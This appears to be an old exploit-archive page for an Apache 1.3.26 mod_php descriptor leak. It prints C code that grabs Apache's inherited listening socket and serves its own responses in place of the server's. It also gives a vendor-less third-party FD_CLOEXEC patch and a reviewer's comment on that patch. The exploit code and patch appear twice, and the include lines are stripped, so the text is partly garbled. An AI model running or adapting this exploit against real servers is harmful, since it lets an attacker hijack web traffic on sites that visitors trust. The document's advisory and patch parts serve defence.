Exploits: Apache mod_php Exploit Datum: 19.08.2003 -------------------------------------------------------- /* TCP Example code by Kien Pham (Heavily documented to help others understand.) This code is now in Public Domain. Look ma, I did this all by myself. This proggie was taken somewhere from the net as a socket example Changed a little for interaction with mod_php -- georgi */ #include // Include these for socket(), connect(), bind(), etc. #include #include // Include this for getprotobyname() #include // Include this for memset() #include // Include this for htonl(), htons(), etc. #include #define PORT 2000 #define THEFD 16 #define INSIZE 20000 void servermsux() { // Variables for the server component of the application. int file_descriptor; // File descriptor that represents the server socket. struct sockaddr_in server_address; // Really only contains the port we want to listen on. int inbound_connection; // File descriptor that represents the socket of the inbound connection. struct sockaddr_in inbound_address; // Address of the inbound connection. int inbound_address_size; // Size of the structure for the inbound connection. unsigned char *address_holder; // Pointer to simplify the extraction of IP addresses. char message[]="HTTP/1.1 200 OK\nContent-Type: text/html\n\n" " Hi MSUX "; // Constant string to send to the client. char buffer[INSIZE]; // Buffer to hold incoming data from the client. // Code for the server component begins here. file_descriptor=dup(THEFD); if (file_descriptor<0) // Check to see if there was a failure in allocation. { perror("Server: socket()"); return; } if (close(THEFD) == -1) {perror("close");return; }; close(1);close(3); while(42) { memset((void*)&inbound_address, 0, sizeof(inbound_address)); inbound_address.sin_family=AF_INET; inbound_address_size=sizeof(inbound_address); // Make sure you do this, or the inbound_address will not be filled with information about the incomming address. 
inbound_connection=accept(file_descriptor, (struct sockaddr*)&inbound_address, &inbound_address_size); // Grab the first socket that represents the client that has connected. If none yet, block and wait till somebody does. if (inbound_connection<0) { perror("2 accept()"); return; } address_holder=(unsigned char*)&inbound_address.sin_addr.s_addr; // Save ourselves a call to the OS to convert. if (read(inbound_connection, buffer, INSIZE)<0) // Read from the client. { perror("2 Server: read()"); return; } if (write(inbound_connection, message, sizeof(message))<0) // Write the message to the client. { perror("2 Server: write()"); return; } close(inbound_connection); // Tell the OS to clean up and free resources that we have used. } //while close(file_descriptor); } int main(void) { printf("\n2 TCP Networking Injection Example\n"); // printf("Written by Kien Pham\n"); // printf("For the Networking mini-Tutorial (http://www.tripod.com/~Xengren)\n"); if (!fork()) servermsux(); } /*----end-------*/ 受影响系统: Apache Group Apache 1.3.26 解决方案: 目前厂商还没有提供补丁或者升级程序,Georage Guninski提供如下第三方补丁: *** src/main/http_main.c.old Sun Oct 20 14:13:47 2002 --- src/main/http_main.c Sun Oct 20 14:44:18 2002 *************** static int make_sock(pool *p, const stru *** 3784,3792 **** --- 3784,3795 ---- GETPRIVMODE(); #endif + if (fcntl(s,F_SETFD,FD_CLOEXEC)== -1) ap_log_error(APLOG_MARK, APLOG_CRIT, server_conf, "make_sock: could not do F_SETFD"); if (bind(s, (struct sockaddr *) server, sizeof(struct sockaddr_in)) == -1) { ap_log_error(APLOG_MARK, APLOG_CRIT, server_conf, "make_sock: could not bind to %s", addr); + // by georgi + #ifdef MPE if (ntohs(server->sin_port) < 1024) GETUSERMODE(); * TCP Example code by Kien Pham (Heavily documented to help others understand.) This code is now in Public Domain. Look ma, I did this all by myself. 
*/ /* This proggie was taken somewhere from the net as a socket example Changed a little for interaction with mod_php -- georgi */ #include // Include these for socket(), connect(), bind(), etc. #include #include // Include this for getprotobyname() #include // Include this for memset() #include // Include this for htonl(), htons(), etc. #include #define PORT 2000 #define THEFD 16 #define INSIZE 20000 void servermsux() { // Variables for the server component of the application. int file_descriptor; // File descriptor that represents the server socket. struct sockaddr_in server_address; // Really only contains the port we want to listen on. int inbound_connection; // File descriptor that represents the socket of the inbound connection. struct sockaddr_in inbound_address; // Address of the inbound connection. int inbound_address_size; // Size of the structure for the inbound connection. unsigned char *address_holder; // Pointer to simplify the extraction of IP addresses. char message[]="HTTP/1.1 200 OK\nContent-Type: text/html\n\n" " Hi MSUX "; // Constant string to send to the client. char buffer[INSIZE]; // Buffer to hold incoming data from the client. // Code for the server component begins here. file_descriptor=dup(THEFD); if (file_descriptor<0) // Check to see if there was a failure in allocation. { perror("Server: socket()"); return; } if (close(THEFD) == -1) {perror("close");return; }; close(1);close(3); while(42) { memset((void*)&inbound_address, 0, sizeof(inbound_address)); inbound_address.sin_family=AF_INET; inbound_address_size=sizeof(inbound_address); // Make sure you do this, or the inbound_address will not be filled with information about the incomming address. inbound_connection=accept(file_descriptor, (struct sockaddr*)&inbound_address, &inbound_address_size); // Grab the first socket that represents the client that has connected. If none yet, block and wait till somebody does. 
if (inbound_connection<0) { perror("2 accept()"); return; } address_holder=(unsigned char*)&inbound_address.sin_addr.s_addr; // Save ourselves a call to the OS to convert. if (read(inbound_connection, buffer, INSIZE)<0) // Read from the client. { perror("2 Server: read()"); return; } if (write(inbound_connection, message, sizeof(message))<0) // Write the message to the client. { perror("2 Server: write()"); return; } close(inbound_connection); // Tell the OS to clean up and free resources that we have used. } //while close(file_descriptor); } int main(void) { printf("\n2 TCP Networking Injection Example\n"); // printf("Written by Kien Pham\n"); // printf("For the Networking mini-Tutorial (http://www.tripod.com/~Xengren)\n"); if (!fork()) servermsux(); } /*----end-------*/ 受影响系统: Apache Group Apache 1.3.26 解决方案: 目前厂商还没有提供补丁或者升级程序,Georage Guninski提供如下第三方补丁: *** src/main/http_main.c.old Sun Oct 20 14:13:47 2002 --- src/main/http_main.c Sun Oct 20 14:44:18 2002 *************** static int make_sock(pool *p, const stru *** 3784,3792 **** --- 3784,3795 ---- GETPRIVMODE(); #endif + if (fcntl(s,F_SETFD,FD_CLOEXEC)== -1) ap_log_error(APLOG_MARK, APLOG_CRIT, server_conf, "make_sock: could not do F_SETFD"); if (bind(s, (struct sockaddr *) server, sizeof(struct sockaddr_in)) == -1) { ap_log_error(APLOG_MARK, APLOG_CRIT, server_conf, "make_sock: could not bind to %s", addr); + // by georgi + #ifdef MPE if (ntohs(server->sin_port) < 1024) GETUSERMODE();
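Review bot: The added `fcntl(s,F_SETFD,FD_CLOEXEC)` check at the top of the hunk only logs at APLOG_CRIT and then falls through to `bind()`, so a listening socket that could not be marked close-on-exec still goes into service and is still inherited by whatever the server executes later. That failure should stop start-up in the same way the bind() error branch below it presumably does (its tail is outside the hunk), rather than continue. FD_CLOEXEC only takes effect at exec, so the change covers programs launched from the server, not code running inside the server process, and whether other inherited descriptors are handled cannot be seen from this hunk. The `// by georgi` line is a C++-style comment, which a pre-C99 build would reject, and it sits inside the bind error branch; I would drop it and put `/* mark the listening socket close-on-exec so exec'd children do not inherit it */` directly above the fcntl call. make_sock() begins and ends outside the hunk, and the same patch is printed twice on this page, so this note applies to both copies.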